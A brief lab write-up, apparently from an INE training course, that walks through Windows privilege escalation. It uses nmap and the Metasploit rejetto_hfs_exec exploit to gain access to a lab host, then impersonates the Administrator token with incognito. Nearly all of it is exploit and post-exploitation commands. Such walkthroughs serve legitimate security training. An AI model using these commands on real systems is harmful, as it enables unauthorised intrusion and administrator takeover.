Privilege Escalation: Impersonate
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.
Objective: Escalate the privilege on a Windows machine.
Tools
Nmap
Metasploit Framework
Writeup
nmap -sSVC demo.ine.local
msfconsole
use exploit/windows/http/rejetto_hfs_exec
set rhosts demo.ine.local
run
getprivs
load incognito
list_tokens -u # List available tokens
impersonate_token "ATTACKDEFENSE\Administrator"
getuid
Last updated